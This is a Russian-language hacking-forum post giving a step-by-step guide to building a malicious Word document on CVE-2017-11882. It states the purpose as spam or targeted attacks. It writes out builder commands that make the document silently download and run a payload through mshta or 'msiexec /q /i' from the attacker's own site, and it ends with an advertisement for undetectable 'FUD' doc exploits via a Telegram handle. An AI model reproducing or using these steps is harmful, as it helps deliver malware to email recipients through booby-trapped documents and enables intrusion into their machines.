создаем простой doc expoit

  • Автор темы Mana_VS
  • Дата начала
  • Просмотров 12470 Просмотров

Mana_VS

Новорег
10
4
12 Янв 2020
Многим из вас иногда нужен doc exploit, для спама или точечных атак. Сегодня покажу как сделать простой эксплойт.
1) для этого нам понадобится обычный скрипт для автоматизации который будет генерировать нашу cve Для просмотра ссылки Войди или Зарегистрируйся
2) мы видим два скрипта которые находятся на 43bt и на 109bt(ограничение на введенную команду)
нам понадобится на 109, потому что кроме того же калькулятора мы запустить ничего не сможем(ограничение). скачиваем скрипт на 109bt
3) МЕТОДЫ
MSHTA
Самое банальное и глупое что можно сделать это метод скачивания mshta,
создаем .hta файл и вносим в него код на скачивание, заливаем на наш сайт. После вводим
python Command109b_CVE-2017-11882.py -c "mshta Для просмотра ссылки Войди или Зарегистрируйся" -o test.doc
MSIEXEC
скачиваем любой конвертвер например этот
Для просмотра ссылки Войди или Зарегистрируйсяконвертируем наш ехе в msi, заливаем msi на наш сайт(если ехес не происходит добавьте в sfx архив). И вводим
python Command109b_CVE-2017-11882.py -c "msiexec /q /i Для просмотра ссылки Войди или Зарегистрируйся"
вот мы разобрали два простых примера скачивания как быстро сделать doc exploit.
Если вам нужен fud doc exploit обращайтесь телеграмм @gankgh